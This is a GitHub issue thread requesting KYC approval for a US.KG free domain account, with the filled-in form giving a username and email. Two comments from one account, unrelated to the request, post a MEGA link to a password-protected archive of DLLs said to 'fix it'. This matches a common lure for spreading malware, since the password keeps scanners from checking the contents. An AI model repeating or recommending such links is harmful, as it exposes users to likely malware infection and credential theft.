### ISSUE TITLE
Request GitHub KYC-ibuytycrcr@gmx.ca

### ISSUE THREAD

**Issue by usomaqo** [DigitalPlatDev/US.KG#9758]
### KYC Using Your GitHub Account

We use automated scripts to approve requests. Please make sure your GitHub account meets the following requirements (all are required):

- [ok ] I have starred this repository.
- [ok ] The issue title must be: Request GitHub KYC - Your US.KG Panel registered email. This ensures our automated script can detect your registered email.
- [ ok] This is not a new GitHub account; it has existing repositories and stars.
- [ ok] This is my first US.KG NIC Panel account.
- [ok ] I promise not to use the domain name for criminal or abusive purposes.

**Your Account Details (US.KG NIC Panel):**

Please fill out the following information; otherwise, your request will not be processed:

- Username: niutyctr
- Account Registration Email: ibuytycrcr@gmx.ca
- Reason for Registering the .US.KG Domain Name:Personal Learning

**Comment by SagarChandra07** [comment]
maybe this will help

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Pass: changeme
I put the necessary dlls in the archive

**Comment by SagarChandra07** [comment]
This might help:This file might fix it

https://mega.co.nz/#!qq4nATTK!oDH5tb3NOJcsSw5fRGhLC8dvFpH3zFCn6U2esyTVcJA
Archive password: changeme
I put the necessary dlls in the archive
